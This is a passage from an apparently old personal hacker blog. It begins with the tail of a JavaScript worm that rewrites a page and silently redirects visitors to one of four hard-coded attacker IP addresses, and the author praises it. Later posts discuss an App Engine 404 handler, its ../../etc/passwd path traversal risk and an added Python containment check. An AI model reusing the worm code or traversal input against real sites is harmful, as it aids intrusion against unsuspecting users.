//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
document.getElementById('contentArea').innerHTML="
< center>
< img src="http://www.hindustantimes.com/images/loading_gif.gif" />;
Please wait...";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see, this worm was written very well, with everything happening in the background
thanks to the power of AJAX.

I'm going to take time and fully reverse this and add comments on how to extend it; until then I'm writing something else :)
Oh, I also have to post a virii I have been reversing for some time now :)

2010/09/24

Commercial Coding

At the Google conference I spoke to a couple of the Google guys and lady ^^
and they all suggested I step into the future and code in more commercial
languages. I think I want to code there (commercially), which means no more
pushing OBSD on clients' servers, no more C/ASM/Perl/ksh and all that
UNIXy stuff :( except for personal projects ^^

Well, let's see how it goes.

2010/09/08

Google Appengine and my slacking attitude ^_^

When we went to the Google Dev conference it seemed like appengine
and KML were the things that really interested me, so when I got
home it was my singular honor to crawl the whole project for bugs
and ways to *hack* up the Google appengine. To my disappointment,
the appengine didn't allow custom 404 handlers, so I had to mess
with the regex for page request handling and got this:

('/.*', hnd404) 

Now that looks like an awesome hack, doesn't it? NO, and yes, you know why:
because it happens that this means I have to handle everything, and I mean
everything, including requests like http://www.foo.com/images/bar.png

This means I need either hardcoded or automated file search and display,
and also custom handlers like Facebook's http://www.foo.com/user to show
a user's profile or something of that sort.

Hard coding means something like this:


import os
from google.appengine.ext import webapp

class hnd404(webapp.RequestHandler):
    def get(self):
        request = self.request.uri
        split_request = request.split("/")
        # split_request[3] is the first path segment of http://host/segment/...
        if split_request[3] == 'images':
            # load the file named by the last path segment from ./images
            file = request.split("/")
            path = os.path.join(os.path.dirname(__file__), 'images', file[len(file)-1])
            self.response.out.write(open(path, 'rb').read())
        else:
            self.response.out.write("404 Error by laudarch for " + "'" + split_request[3] + "' Not Found ;p")

Looks extremely cool, doesn't it ^^ but then won't you have security
problems with this? What if someone requests ../../../../../../etc/passwd O_O
What are you going to do then? Beg Google for mercy and help?
Yep, I know it can't be possible if we are doing
path = os.path.join(os.path.dirname(__file__),...
because this tells appengine to start from my current directory etc., but let's
skip that argument; it would take pages to explain the *potential* issues
with that technique and the fact that it sucks.
It sucks!! Yep, it does, because you will have to handle all that
BS. I'm still working on a better format and have seen some cool ideas,
but then that brings us to my slacking :(
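
os.path.join does not confine a path on its own: a ".." segment is kept and an absolute component replaces everything before it, so a handler that joins more than the last URL segment needs an explicit containment check. The following is an added example, not the author's code: it is plain Python 3 standard library rather than App Engine, the function names are hypothetical and the directory tree is constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote, urlsplit

PREFIX = "/images/"

def naive_path(base_dir, url):
    """Join everything after /images/ onto the base, with no checks.

    Only meant for URLs that contain /images/; shown to make the failure visible.
    """
    rel = unquote(urlsplit(url).path).split(PREFIX, 1)[1]
    return os.path.join(base_dir, "images", rel)

def safe_path(base_dir, url):
    """Return the real path of a file under <base_dir>/images, or None."""
    path = unquote(urlsplit(url).path)      # decode %2e%2e%2f before checking
    if not path.startswith(PREFIX):
        return None
    rel = path[len(PREFIX):]
    if not rel or "\x00" in rel:
        return None
    root = os.path.realpath(os.path.join(base_dir, "images"))
    # realpath collapses ".." and follows symlinks, so the comparison below
    # is made on the file that would actually be opened
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None

def make_demo_tree():
    """Constructed layout: <base>/images/bar.png is public, <base>/secret.txt is not."""
    base = os.path.realpath(tempfile.mkdtemp())
    os.mkdir(os.path.join(base, "images"))
    with open(os.path.join(base, "images", "bar.png"), "wb") as f:
        f.write(b"PNG")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("not for serving")
    return base

if __name__ == "__main__":
    base = make_demo_tree()
    for url in (
        "http://www.foo.com/images/bar.png",
        "http://www.foo.com/images/../secret.txt",
        "http://www.foo.com/images/%2e%2e%2fsecret.txt",
        "http://www.foo.com/images//etc/passwd",
    ):
        print(url)
        print("  naive:", os.path.normpath(naive_path(base, url)))
        print("  safe: ", safe_path(base, url))
```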

I don't have enough *time*. I'm a beginner diff boy for OpenBSD and
am *yet* to send a diff; I'm working on a payment system, a wifi system,
an SHS Graduate government project, etc., so
I'm in need of more time, not to talk of hardware and phreaking hehe
and security scans which I should be blogging about;
University of Ghana comes to mind after their funny sweep of the
viagra ads and not blocking the sec hole in their site. Suckers, just
ask for help hehe.

I have like five appengine projects on my laptop that are waiting to
be completed, and I'm here calling GTUG Ghana developers slackers, which
got me into a lamer argument with a retard ^^

So I'll do my best to complete them because they are great and cool, and
I'll try to share more appengine tricks. These are not the only ones I
have found or done, but then again I have to complete a project by Friday
and I have barely started.

OK, bye :)